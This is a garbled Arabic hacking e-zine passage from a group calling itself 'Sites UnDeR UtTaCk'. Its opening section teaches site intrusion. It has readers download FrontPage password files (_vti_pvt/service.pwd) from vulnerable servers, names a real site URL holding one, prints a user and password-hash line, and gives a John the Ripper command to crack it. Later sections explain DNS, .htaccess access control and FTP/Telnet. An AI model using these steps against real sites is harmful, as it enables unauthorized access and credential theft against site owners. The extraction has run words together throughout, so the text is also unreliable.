الملقم وهو apache 1.3.20 و دعمفرون تبیج FrontPage/5.0.2.2510 وهذه ملیانةثغرات<br />

والثال ث النظام وهو<br />

الملقم<br />

Linux<br />

اول شيءاباتشي منالملقماتالصعبة ا لإختراق إلا بع ضالإ صدارا ت منهافنحط هذه على جنب.‏<br />

نشو ف دعمالفرون تبیج<br />

<strong>١</strong>٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

زي ماقلناالفرون تبیج ملیانثغرات<br />

وثغراتهقویة وكثیرةتقریبا<br />

منها مجلد<br />

vti_pvt_ و<br />

private_ هذهاللي نحتاجها غیره مامنهفایدة<br />

داخلالمجلدین راح نلاقياربع ملفات مهمة وهي service.pwd و users.pwd و<br />

authors.pwd و adminstators.pwd ویعتبر هذااخطر مل ف<br />

طیبلوقدرنا ننزل واحد منالملفات هذه ‏(ملاحظةالثغرة هذه موجودة ب<br />

عالن ت)لو نزلناها نفتحهابالمفكرة ونلاقي السطر هذا على سبیلالمثال<br />

goodyco:CalXS8USl4TGM<br />

٧٠% من المواقعالموجودة<br />

وهذا من موقعقودي http://www.goody.<strong>com</strong>.sa/_vti_pvt/service.pwd<br />

طیبال حین goodycoالیوزر والباسس مشفر واللي هو CalXS8USl4TGM<br />

وشلون ینفك؟ ینفك ببرنامجاسمه<br />

john the repaier<br />

تنزلهوتح ط المل ف المشفر ‏(معالیوزر)بمجلد واحدوتفتحالدوسوتروحلمجلد جوهنوتكتبالسطر<br />

التالي john -i PASSWORD.FILE<br />

وعاداستناه یطلعلكالباسس<br />

طیب نرو حللفقرةالثالثة واللي هيالنظام<br />

زي ماشفنا النظام هولینكس<br />

لكنلینكسای ش؟فیه رید هات و ماندریك وفیه منهإ صدارتكثیروثغرات اكثر<br />

لكن هنا راحتواجهك مشكلتین<br />

اول شيءمعرفةالنظامتقدرتطلعه منابداوتشغیل ول telnet واكتب عنوانالموقع یطلعلكالنظامفوق<br />

نوعه وإ صدارته<br />

المشكلةالثانیة لازم یكون عندكلینكساصلا<br />

علشانثغراتهبلغةال c وهذه ماتشتغلإلا عاللینكسفقط<br />

================<br />

<strong>١</strong>٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

/http://neworder.box.sk هذاالموقع مفید جداتكتب مثلا ‏(فوقبالمربعاللي عالیمین)‏ IISاو<br />

apacheاو منتد ى واصدارتهاوايبرنامج ویطلعلكثغراته<br />

http://www.ussrback.<strong>com</strong>‏/الموقع هذا خطیر جداً‏ جداًتروح ل EXPLOITSاللي عالیسار<br />

وتختاراولاختیار هناثغرات جمیعالانظمة منلینكس و ویندوز و و والخ..‏ ومنوعة من<br />

یونيكود...‏<br />

c و perl و<br />

<strong>١</strong>٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

" معلومات عن ال " DNS<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$$$$$$$<br />

الكاتب:‏ ACID BURN_EG<br />

$$$$$$$$$$$$$$$$$$$<br />

ماهو ال ؟؟؟ DNS<br />

==============<br />

DNS ‏:هواختصارلكلمه Domain Name System ویتصل سرفرال DNS عادة علىبورت<br />

٥٣ ممایعنىانكاذااردتالاتصاللأحدالمواقع واستعملتال DNSلهذاالموقعفسوف تتصلبه عن<br />

طریقالبورت ٥٣ و سوفیترجماویحولال translates alphabetical hostnames ویعنى<br />

اسم الموقع مثل : http://<strong>www.3asfh</strong>.<strong>com</strong>/ الى IP ADRESSES مثل ,<strong>١</strong><strong>١</strong><strong>١</strong>٫ <strong>١</strong><strong>١</strong><strong>١</strong>٫ <strong>١</strong><strong>١</strong><strong>١</strong><br />

<strong>١</strong><strong>١</strong><strong>١</strong> و العكس ص حیح و عندما تتمالعملیه تتصلبالموقع مباشره و عملیه التحویل هذهتسمى<br />

addressاىتحویلاوت resolution حلیل عنوان الموقع الى IP اوالعكسلنستطیعالاتصالبه<br />

قبل ظهورال DNSكاناسماخر لعملیهال.‏ address resolution ولكنقد ظهرال DNS لجعل<br />

تذكر عناوین المواقع وحفظها اكثر سهولة ومرونة من ذيقبل حی ثقبل ظهور هذهالخدمةفانكللدخول<br />

لموقعمعین یجب علیك كتابةال ipلهذاالموقعللدخولالیه address وكانالاسم المستعملله<br />

قبلال DNSكانیتكون من مل فاسمهال HOST FILE وكان عباره<br />

عناسماء الهوستسا ىالمواقع و عنواوینال IP الخاصهبهم وكان هذاالمل ف تتولى رعایته<br />

، و<br />

address resolution<br />

(SRI-NIC). Stanfordو Research Institute's Network Information Center<br />

.<br />

كان على هذاالراعى ان یجد ث (UPDATE) الجدول هذا حوالىكلاسبوع و یمدهبالعناوین الجدیده و<br />

الارقام التى ظهرت و علىالسیستمادمینان یجدد هوالاخر ملفهاو عن طریق اتصالال FTPبینه و<br />

بینلراعىاى.‏SRI-NIC وبعد فترة من الزمن رأوفيان هذهالطریقة غیره مجدیة وغیرفعالة ومع<br />

تطور خدمةالانترنتكل ذلكأد ى الى ظهور ال DNSلیفعل ذلك.‏<br />

وال DNSلیسله مركزاى decentralized اىانهلیس هناكمكانمعیناو نظاممعینیتحكمفىكل<br />

ال DNSبلبال عكسفال DNS عباره عنقاعدةبیبانات موزعهبشكل منظم وتوجد علىأمثرمن سیرفر<br />

وكل سیرفر علیه DNS یعر فاین یبحث عندما یریدانی حصل علىمعلومهمعینهاوهوستمعیناو<br />

یریدتسجیللدومین جدید<br />

هذهكانت مقدمة مبسطة عن هذهالخدمة واهمیتها<br />

...<br />

SERVER: THE DNS خادم الدياناس :<br />

================================<br />

ال DNSهو SERVER عباره عنكمبیوترویعمل عادتا على نظام UNIX أولینكس و یستخدم<br />

برنامجالیونكس BIND اى Domain). (Berkeley Internet Name و هنالكبرامج عدیدة مثل<br />

هذهللویندوز و الماكنتو ش,وغیرهااذااراداحداستعمالهم ك DNS SERVER ولكنالكل یفضلال<br />

. UNIX ویتكونبرنامجال : DNS منجزئین<br />

the name server itself (the daemon program that listens<br />

RESOLVER یسمى toوالاخر port 53)<br />

و ال NAME SERVER هذا یستجیبالى متصف حك عندماتطلبمعلو مهمعینهفمثلا عندماتفتح<br />

الانترنت اكسبلورر وتكتباوتطلب منه موقهمعین مثل ‏/‏http://<strong>www.3asfh</strong>.<strong>com</strong>فسیسأل<br />

موجودله ‏(و هذا یعتمد على اتصالكبالشبكه و رقمالا ىبىالخا صبك)‏ عن عنوان<br />

ال IPلهذ ا الموقعالمطلوب<br />

لان المتصفح یحتاج هذاال IPلیجد السرفر الذ ىلدیه هذاالهوستا ى هذا الموقع و یطلبمحتویات<br />

http://<strong>www.3asfh</strong>.<strong>com</strong>/<br />

المتصفحاقرب DNS<br />

<strong>١</strong>٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

الموقع منالسرفرلیعرضهالكفى متصف حك.‏<br />

وقبل هذا سیسألال daemonفى program جداولهاىفى ذاكره متصف حك عن الموقعالذىتطلبه<br />

فأذالم یجده ینتقلالى ما سبق شرحه و هكذا تتمالعملیه.‏<br />

THE TREE INFORMATION:<br />

=========================<br />

الان بعدان اتقفنا علىانك عندماتطلب رقم IP معین منالمتصفح حقك و لا یجدهفىال DNS الم حلي<br />

ا ى الخا صبك سو فیسألال DNS SERVER الاعلى منهفى المستوى عنهلیجده واذالم یجدهفى<br />

مستوىاعلىفینتقلللبح ثفى مستوىاعلى واعلى و هكذا یسیرالب حث منالاقل الىالاعلىفى<br />

مستویاتال.‏SERVERS DNS<br />

:<br />

و طبعانتیجه من هذاالاتصالفسنستنتج وجود شجره اتصال و معلومات ولكنكی فتعملبالضب ط دعونا<br />

نأخذ مثال<br />

لوفرضناانال ISP الخا صبككان مثلا isp.co.uk و هذایعتمد على اتصالكبالانترن تاى حسب<br />

الشركه و السرفر الذىتشبك علیهفمنالطبیعى طبعاان یكون ال ISP's DNS server's<br />

IP حثلك عن والانفالنفر ضانك سألت هذاال DNSلیب dns.isp.co.uk مثل هذا hostname<br />

الخا ص ب http://<strong>www.3asfh</strong>.<strong>com</strong>/ مثلافسیقوم هذاال dns.isp.co.uk بالبحثفى جداوله<br />

الم حلیه المخذنهفىالذاكره عندهفیجدها و اذالم یجدهافسینتقلكماقلناالى مستوىاعلى منال DNS<br />

لیب حثفیه واذالمیجدهایضافىالمستو ىالاعلىفعلیهان یقوم بتغییر مكانالب حثكلیا<br />

فمثلا من dns.isp.co.uk الى some-organization.org.uk او<br />

‏,‏university.ac.ukوالخ england.gov.uk, airforce.mil.uk وهناكامثلهكثیرا طبعا و<br />

كل شئ ینتهى ب UK واذالم یجدهایضافىكلالاماكن المتاحله الب حثفیهافسیرجعالمتصفحالى<br />

موجود علىالشبكه واسمهال ROOTفهو یحتوى علىكل عناوینال IP علىكلللمواقع<br />

الموجوده علىاى DOMAIN NAME وهذكا حسب هذهالعملیةالتسلسلیةیتنقل ال DNSبحثا عن<br />

school.edu.uk,<br />

SERVER<br />

اكبر DNS<br />

الدومین .<br />

متى یفشل ال DNSفيال حصول علىالموقعاوتحدید موقع هذاالدومین ؟<br />

======================================<br />

أتمنىانتكونالاجابةقد وصلتلأفهامكمقبلانأذكرها وهياماافي حالة عدم وجود هذاالدومین<br />

بالاصل وسیطولالبحث لانها سیبحثفيكلالمراحل حتى یصلللجذز ویبحثفيكلالايبیات<br />

أوالدومیناتالمخزنةفیه ومنثم ستكونالاجابة<br />

البحث ما یقارب ‎٢٠‎ثانیة <strong>١</strong>٥<br />

الحالة الأخرى<br />

نتیجه طولالب حثفیقوم متصف حك بقدانالاتصال معال DNS اى عملیه.‏ TIMED OUT<br />

وفى هذه الحاله نضغطفىالمتصفح على REFRESH او RELOAD طبعا حسب متصف حك<br />

ROOT<br />

address could not be found وقد یستمر<br />

...<br />

–<br />

:<br />

<strong>١</strong>٧


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

شرح ملف<br />

" htaccess<br />

..... htaccess<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$$<br />

BSD-r00t<br />

$$$$$$$$$$$$$$<br />

الكاتب:‏<br />

|<br />

مقدم ة<br />

‏*اهمیة مل ف<br />

‏*كیفیة عمل مل ف<br />

* عمل صفحات<br />

منع عر ض محتویاتالمجلد الذي لا یوجدبه<br />

منع/‏ اتاحة دخول الموقع لاشخا صمعینة<br />

‏*تحویل من یحاول فتحلینكللینكاخر<br />

|<br />

* |<br />

|<br />

htaccess. |<br />

|<br />

htaccess.<br />

|<br />

|<br />

error خاصة<br />

|<br />

index<br />

* |<br />

|<br />

* |<br />

|<br />

|<br />

|<br />

| * عملالمل ف .htpasswd<br />

|<br />

| * الحمایةبواسطه htaccess.<br />

|<br />

htaccess.<br />

* |<br />

|<br />

|<br />

|<br />

|<br />

--------------------------------------------------<br />

منعاظهار المل ف<br />

‏*اضافة مستخدمینفيالمل ف<br />

* جعلالصفحا تتظهربامتداداخر<br />

مقدم ة<br />

.<br />

*<br />

------------<br />

مناهم وسائل حمایةالمواقع واغلاق بع ضالاجزاءفیه بكلمة سر ، و منع بع ضالناس من دخل الموقع<br />

و السماحلغیرهمبالدخول .. هواستخدامالمل ف htaccess. والذي یمكن عملالكثیر والكثیربه .<br />

و هذا المل ف مخفي و محمي بكلمة سر<br />

‏*اهمیة مل ف<br />

index<br />

htaccess.<br />

-----------------------<br />

error خاصةبك<br />

-٤<br />

<strong>١</strong>- حمایةايجزءفیه بكملة سر<br />

٢- عمل صفحات<br />

٣- منع عر ض محتویاتالمجلدالذي لا یوجدبه<br />

منع/‏ اتاحة دخولالموقع لاشخا صمعینة<br />

‎٥‎‏-جعل صفحة البدایة بأمتدادات غیر .asp. .. html ,<br />

‎٦‎‏-تحویل من یحاول فتحلینكللینكاخر<br />

‏*كیفیة عمل مل ف<br />

htaccess.<br />

---------------------------<br />

یمكنك عمل هذا المل فبواسطهاي محرر نصو ص مثلالنوتباد "Notepad" عن طریق عملللمل ف<br />

حفظباسم و نحفظالمل فبهذاالاسم htacces. علىان یكونلی سامتداده ‏.‏txtايانلیس هناكاسم<br />

- علامتيالتنصی صفياسمالمل ف<br />

للمل ف ‏،اذالمتستطیع ذلكاحفظ المل فباسم<br />

. -<br />

"htaccess."<br />

<strong>١</strong>٨


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

* عمل صفحات<br />

.<br />

- :<br />

error خاصة<br />

------------------------<br />

.<br />

و الفائدة منهاهوانالموقع یظهربشكل افضلكماانه عند محاولةاي شخ ص عمل سكان علىالموقع<br />

سو ف یظهرانكان الموقعبهكل الثغرات و ذلك لان طریقة عمل السكانر هيانه یقوم بتطبیقكلثغره<br />

على الموقع و یرصدالنتیجه<br />

فاذاكانهناكايتغیر یظهرلككأنالموقع علیه هذهالثغره<br />

و یمكنك عم ل صفحاتال error الخاصه ك عن طریق<br />

أ-تصمیم صفحاتال errorاولا<br />

ب-تحمیلالصفحات علىالموقع<br />

ج-اضافه السطر الكتابيفيالمل ف htaccess.<br />

ErrorDocument error_num<br />

directory_file<br />

ب حی ث یكون error_numهو رقمالخطا ‏"الارقام موجودبالسفل<br />

صفحهال errorالتيقمت بتصمیمها<br />

مثال<br />

" و<br />

ErrorDocument 404<br />

.<br />

:<br />

/errors/nfound.html<br />

errors وارقامها : -<br />

-----------------------<br />

| Bad Syntax | ٤٠٠ |<br />

-----------------------<br />

| Unauthorized | ٤٠<strong>١</strong> |<br />

-----------------------<br />

| Not Used | ٤٠٢|<br />

-----------------------<br />

| Forbidden | ٤٠٣ |<br />

-----------------------<br />

| Not Found | ٤٠٤ |<br />

-----------------------<br />

ال<br />

منع عر ض محتویات المجلد الذي لا یوجدبه<br />

index<br />

*<br />

-----------------------------------------------------<br />

directory_fileهو مكان<br />

بع ضالمواقع عند محاولة فتحاي دلیل علیها و لا یكونبه مل ف index یقوم الموقعبسرد جمیع<br />

محتویات هذاالدلیلولحل هذه المشكلهتوجد طریقتین<br />

أ-‏ وضع مل ف indexفيكلالمجلدات " وبالطبع هذ اصعب جدا<br />

ب-باستخدامالمل ف htaccess. عن طریقاضافه السطرالتاليفي المل ف<br />

منع/‏ اتاحة دخول الموقع لاشخا صمعینة<br />

"<br />

-:<br />

Options -Indexes<br />

-:<br />

*<br />

----------------------------------------<br />

<strong>١</strong>٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

..<br />

یمكنكباستخدامالملف htaccess. منع شخ صمعین من دخولالموقع بعدمعرفةالايبيالخاصهبه و<br />

یمكنكالاس تفاده من ذلك حیث یمكنك منع دخلالموقعلمن لاتریدكما یمكنك منع دخولالموقع لاي شخ ص<br />

فياسرائیل مثلا<br />

و یمكنك ذلك عن طریقاضافةالسطرالتاليفيالمل ف<br />

؟؟؟.؟؟؟.؟؟؟.؟؟؟ deny from<br />

- :<br />

حیثان ؟؟؟.؟؟؟.؟؟؟.؟؟؟ هوالايبيالخا صبه .<br />

واذااردت منعاياحد من دخول الموقع یمكنكاضافة السطر التالي<br />

- :<br />

deny from all<br />

- :<br />

؟؟؟.؟؟؟.؟؟؟.؟؟؟ allow from<br />

واذااردت السما حلشخ صمعینبدخول الموقع یمكنك ذلكباضافةالسطر التالي<br />

حیثانا ؟؟؟.؟؟؟.؟؟؟.؟؟؟هوالايبيالخا صبه<br />

‏*تحویل من یحاول فتحلینكللینكاخر<br />

-------------------------------------<br />

وتسمى هذهالعملیه ب Redirection وهي مناهمفوائد ‏.‏htaccessالمل فتستخدم مثلا عندتغیر<br />

موقع مل فقدیم علىالموقعالى مكان جدیدفیمكنكباستخدامالمل ف htaccess. عند محاولةاحد فتح<br />

احدالینكالقدیمتوجیههالىالینكالجدید عن طریقاضافةالسطر التاليفيالمل ف<br />

- :<br />

؟؟؟.؟؟؟/‏ /somewhere/???.??? Redirect<br />

http://www.site.<strong>com</strong>/newlocation<br />

ب حی ث یكون ‏/‏somewhere‏/؟؟؟.؟؟؟هو مكانالمل فالقدیم و<br />

http://www.site.<strong>com</strong>/newlocation ؟./‏ ؟؟ ؟؟؟هو مكانالمل ف الجدید.‏<br />

----------<br />

* عملالمل ف .htpasswd<br />

------------------------<br />

ویمكنكأنتقوم بعملهبنفس طریقة المل ف htaccess. ، و سو فنعمله حتى نسطیعاستخدامالمل ف<br />

htaccess في الحمایة و سو ف نكتبفيالمل ف htpasswd ما یأتي<br />

.<br />

-:<br />

user1:EncryptedPwd1<br />

user2:EncryptedPwd2<br />

o حیثان user1 , user2 هواسم المستخدم .<br />

o و<br />

EncryptedPwd1 , EncryptedPwd2 هيكلمات السر ولكن مشفره و یمكنكتشفیراي<br />

كلمةتریدها عن طریق الموقع<br />

http://www.euronet.nl/~arnow/htpasswd<br />

او http://www.e2.u-net.<strong>com</strong>/htaccess/make.htm<br />

فمثلالواردنا وضع یوسرباسم Security وكلمةالسر الخاصةبه هي fu93hds3 نذهباولا الى<br />

الموقع<br />

http://www.euronet.nl/~arnow/htpasswd<br />

username : Security و o<br />

passwrod & re-enter password : و fu93hds3 o<br />

Security:893bNicBcwszw


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‏*الحمایةبواسطه htaccess.<br />

----------------------------<br />

.<br />

وتعتبرالفائدةالرئیسیةللمل ف حیثانه یمكن منعاياحد من دخول دلیلمعینفيالموقعالااذاكانمعه<br />

كلمة السر والیوسر نیم ‏،فیمكنك عن طریقها عمل منتدى خا صاواي شئترید.‏<br />

فعند وضعالمل ف ‏.‏htaccessفياي دلیل و حاولاحد دخول هذاالدلیلاوايجزء یندرجتحته سو ف<br />

یطلب منه كلمة سر و یوسر<br />

و یمكنك عمل ذلك عن طریقاضافة ما یأتيفيالمل فقبل نسخهفيالدلیلالمراد حمایته<br />

--:<br />

AuthUserFile<br />

AuthName "Enter your user and passed "<br />

user-Require valid<br />

AuthType Basic<br />

/somewhere/.htpasswd<br />

please<br />

<br />

require valid-user<br />

<br />

oب حی ث یكون somewhere/.htpasswd‏/هو مكان مل ف htpasswd. على موقعك<br />

o و یكون Enter your user and passed please هي الرساله التي سو فتظهر لتطلبكلمة<br />

السر<br />

منعاظهار المل ف<br />

htaccess.<br />

*<br />

-----------------------------<br />

قد عرفناالانانلهذا المل فاهمیهكبیرهفیجب علیناان نحمیه جیدا ‏،فالبرغم منانالمل ف مخفيالا<br />

انه غیر سالم منان یكون السرفر نفسه غیر مؤمناوانههناكتصریح خطأ<br />

لذلك سو ف نمنع عر ض هذاالمل ف عن طریقاضافة ما یأتي<br />

..<br />

<br />

order allow,deny<br />

- :<br />

deny from all<br />

<br />

فاذا حاولاحد عر ضالمل ف سو ف یظهرله . error 403<br />

* جعلالصفحا تتظهربامتداداخر<br />

-------------------------------<br />

ویمكنباستخدام هذهالخاصیة عمل مل ف یظهركأنامتداده<br />

باضا ف السطر التالي<br />

html. ولكنه ذوامتداد txt. مثلا .<br />

AddType text/plain html<br />

- :<br />

-:<br />

ویمكنك رؤیةكافةالتغیراتالتي یمكنك عملهافي هذاالمل ف<br />

http://www.pharaonics.net/books/MIME.txt<br />

...<br />

٢<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

" FTP<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

نظام نقل الملفات<br />

..........<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$<br />

الكاتب:الجوكر<br />

$$$$$$$$$<br />

ما هو نقلالملفا ت FTP؟<br />

FTPهياختصارلكلمة File Transfer Protocol وتعنيبروتوكول نقل الملفات،‏ وهذهالخدمة هي<br />

احدىتسهیلات TCP/IP التيتجعل منالممكن نقلالملفا تبین الكمبیوترات علىالشبكة ومن میزات<br />

FTPالرائعةأنهاتقوم بترجمة شكل الملفاتالنصیةبطریقةأتوماتیكیة حیثأنالكمبیوتراتتحتوي نظم<br />

تشغیل مختلفة وعلیهفلدیهاأشكال Formats مختلفةللملفاتالنصیةفبالتاليتحتاج لترجمة وهو ماتقوم<br />

به FTP, وبخدمة نقل الملفاتفاننانحتاجلبضع نقرات على الفأرةكي ننقل ملفاًفيأمیركا الى جهازنا .<br />

أقسام نقلالملفات :<br />

:<br />

.<br />

نقل الملفات ینقسمالىقسمین :<br />

تنزیل الملفا ت:‏Download<br />

وهو جلبالملفات منالكمبیوترالمضی ف Host الىالجهازالم حلي.‏Local<br />

ارسالالملفا ت:‏Uplaod<br />

وهوارسال الملفات منالكمبیوتر الم حلي Local الىالكمبیوترالمضی ف.‏Host<br />

ومنالناحیة الأمنیةفهناك نوعانلنقل الملفات :<br />

نقل مؤمن:‏FTP Secure<br />

تحتاج الىاسم مستخدم وكلمة مرورللدخولالى النظاموت حصل علیه من مدیرالنظامالمضیف.‏<br />

نقل مجهول:‏FTP Anonymous<br />

لاتحتاجالىاسم مستخدم وكلمة مرورللدخولوتستطیع غالباًاستخدام guestأو anonymous<br />

عوضاً‏ عنهما.‏<br />

تصن ف مصادر البرامج علىالانترنت الىثلاثةأقسام<br />

ملكیة عامة:‏Domain Public<br />

وضعتالبرامج هناللاستخدام العامفلیس هناك حقوق ملكیةلأحد ولاقیود علىاستخدامهاوتوزیعها<br />

وتعدیلها<br />

مصادر مجانیة:‏Freeware<br />

یح قللجمیعاستخدام هذه البرامجأوتوزیعها ولكن هناك حقوق ملكیة ونشر ولا یجوزتعدیلهاأوبیعها.‏<br />

مصادر مشتركة:‏Shareware<br />

یتمتوزیع هذهالبرامجبغر ض التجربةقبلالشراء وقدلاتتضمن جمیعالممیزات ویجبت حطیم النسخ بعد<br />

انتهاء مدتها.‏<br />

FTPو الفیروسات<br />

:<br />

یجبأنتعلمفيالبدایةأن الملفات والبرامجتنقسمالىقسمین<br />

ASCII:<br />

٢٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

اختصاراًل Interchange) American‏)والملفا Standard Code for Information ت من<br />

هذا النوعتحتوي على سبعة جزیئا ت bits تتراو حقیمتهابینالصفر و <strong>١</strong>٢٧. ویستخدم هذاالمصطلح<br />

للتعبیر عن المعیارالذي یقوم بتحویلالأحر فالىأرقامفيالكمبیوتر.‏ وتستخدمالملفاتالنصیة هذاالنو ع<br />

منالصیغ.‏<br />

Binary:<br />

وتعنيالملفات ذاتالنظامالثنائي وتحتوي علىثمانیةجزیئات bits تتراو حبینالصفر و ٢٥٥ وتندرج<br />

الصور والبرامج والملفات المضغوطةتحت هذاالنو ع.‏<br />

والفیروسات لا یمكنأنتنتقل عبر ملفات ASCIIكما لایمكنأنتنتقل عبرالصوركصیغ & gif jpg &<br />

avi - ram - mpg - mp3 - منامتداداتالصور ولا عبر ملفاتالفیدیو والصوت مثل bmpوغیرها<br />

wavوغیرها ، وبمعنى آخرفانهاتنتقل عبر البرامج وملفاتالنظام والتشغیل والبرامج المضغوطة وعادة<br />

ماتكون - xxe : exe - <strong>com</strong> - bat - dll - drv - sys - bin - ovl - zip - mim - uue -<br />

bhx، b64‎كما - یمكنأنتنتقلفیروساتالماكرو عبرتطبیقا ت Office، MSلذلكاحذر من هذه<br />

الملفات واف حصها دائماًقبلتشغیلها.‏<br />

طریقة نقل الملفا ت : FTP<br />

هناك طرق عدیدةلنقلالملفات وهي :<br />

نقل الملفاتباستخدام نظامUNIX<br />

تتطلب هذهالعملیة عادةاستخدامأوامر وهاهنا بع ضأوامر:‏UNIX<br />

لنقل ملفات ASCII النصیة،‏ وعندتغییر هذا الوضعثمالحاجةلنقل ملفات من هذا النو عفیجب<br />

اعادةالأمر.‏<br />

لنقل الملفاتالثنائیة،‏ وعندتغییر هذا الوضعثمالحاجةلنقل ملفات من هذا النو عفیجباعادة<br />

الأمر.‏<br />

لفح ص المل ف ومعرفة هل هو من نو ع ASCIIأو.‏Binary<br />

لعر ضقائمة بأوامر.‏UNIX<br />

‏:‏dirعر ض محتویاتالدلیل<br />

‏:‏lsعر ض محتویاتالدلیلالحالي.‏<br />

تغییر الدلیل.‏<br />

filename: getجلب المل ف المطلوب وانزاله على جهازك.‏<br />

filename: mgetجلب مجموعة منالملفا ت.‏<br />

pwd: طباعةالدلیل الحالي.‏<br />

‏:‏byeانهاءالارتباط والخروج من النظامالبعید.‏<br />

ascii:<br />

binary:<br />

status:<br />

help:<br />

cd directory:<br />

نقل الملفاتباستخدام حساب:‏Shell<br />

أول ماتفعلهفي هذاالنو ع من نقلالملفات هوادخالالملقنالخا صبشركةتوفیرالخدمةفمثلاً‏ سو فتدخل<br />

حسابكفي Tripod عن طریق Shell، Unix نكتبأولاً‏ الأمر ftp متبوعاًبالوجهةالمرادةفیصبح :<br />

ثم ندخلالاسم وهو عل سبیل المثال ‏،"‏IronPrivate‏"ثم نقومبادخالالرقم<br />

السري وهو مثلاً‏ "******". وبعدالدخول الىال حساب یمكنكاستخدام نفسأوامر Unix المعتادة.‏<br />

وإ ذاأردت المزید منالمعلومات عن نظامالUnix<br />

ftp ftp.tripod.<strong>com</strong><br />

٢٣


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

علیك الدخوول الى هذاالموقع:‏<br />

http://www.pc-worlds.net/lunexx.html<br />

فهو یفیدالمبتدئینفى هذا النظام .<br />

نقل الملفاتباستخدامالمتصفح:‏Browser<br />

نقل الملفا ت عن طریقالمتصفحات سهل جداًفما علیك سو ىادخال عنوان الموقع URL ویبدأ العنوان<br />

بكلمة ftp‏://ثمالعنوانبدلاً‏ منكلمة http‏://للعناوینالعادیة،‏ بعد الدخول الى موقعال FTP ستأتي<br />

الصفحة عبارة عن ملفات ومجلدات وماعلیك سو ى النقر على المل ف المطلوب لانزاله.‏<br />

نقل الملفاتباستخدام حساب:‏SLIP/PPP<br />

أفضلاستخدامات هذا النو ع من الربطأنهاتسمحلناباستخدامبرامجتابعة Programs. Client<br />

وأفضلبرنامجتابع یمكناستخدامهللنوافذ Windowsهوبرنامج.‏Ws_ftp<br />

استخدامبرنامج<br />

ادخل على البرنامج وذلكبالنقرالمزدوج علىأیقونةالبرنامج،‏ سیظهرلك مربع حوار Session<br />

Profileوالذي من خلالهتقوم بتسجیل الدخول،اكتبفي خانة Profileاسم Name حسابالدخول؛<br />

اسم الملقن وفي<br />

هذا المثال هو ftp.tripod.<strong>com</strong>ثمفي خانة Hostاختر Type Autoلكي Detect یقومبالتدقیق<br />

التلقائيفي نو ع نظامالجهازالمضی ف،‏ بعد ذلكقم بكتابةالاسمفي خانة User ID وهو مثلاً‏<br />

ثم الرقم السريفي خانة Passwordوسیظهر مخفیاً‏ علىهیئة نجوم ‏******،ثم<br />

اضغط ‏.‏OKكمافي الشكل التالي :<br />

خانة Host Name<br />

Ws_ftp LE 5.06:<br />

على سبیلالمثال My Home Page In Tripod واكتبفي<br />

IronPrivate<br />

بعد ذلك سیقوم البرنامجبالدخول الىال حسابالمطلوب وستنقسم نافذة البرنامجالىقسمین؛ القسمالأیسر<br />

هو جهازالكمبیوترلدیك والقسم الأیمنهو جهازالكمبیوترالمضی ف،في هذهالمرحلةتستطیع جلبأو<br />

ارسالالملفاتأوتغییراسمائهاأو حذفها ‏...الخ.أيتستطیعالتحكمفي محتویات حسابك علىالانترنتأو<br />

على جهازكبسهولةفائقة.‏<br />

نقل الملفاتباستخدامالاتصالالشبكيالبعید Telnet:<br />

Telnetهيبروتوكولانترنتمعیاريلخدماتالربط عن بعد ویسمحللمستخدمبربط جهازه على<br />

٢٤


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

كمبیوتر مضی ف جاعلاً‏ جهازه وكأنهجزء من ذلكالكمبیوتر البعید.‏ ویختل فالعر ض حسب نظامالكمبیوتر<br />

المضی ف.اذاكان الجهازالبعید یستخدم نظام Windowsفلا مشكلةأمااذاكان یستخدم نظام آخرفیجب<br />

معرفة بع ضالأوامرللتحكم وأهمأمر یجبأنتعرفههو ‏"؟"‏ والذي یحضرلكقائمةبالأوامراللازمة.‏<br />

‏-استخدامبرنامج Telnet من Windows:<br />

ترفق Windowsبرنامجاً‏ سهلاً‏ یسمى Telnetیمكنك الدخول علیهبالضغط علىقائمةابدأ Startثم<br />

تشغیل Runثماكتب Telnetوستنفتحلك صفحة البدءللبرنامج..‏ من Connectاختر Remote<br />

في صندوق الحوار Connect الذي سیظهرلكاكتبفي خانة Host Name اسم ملقن<br />

الجهازالمضیفثماكتبفي خانة Port المیناءأوالمنفذ ‏(اذاكانلدیك)او اتركهكما هو،ثماختر منال<br />

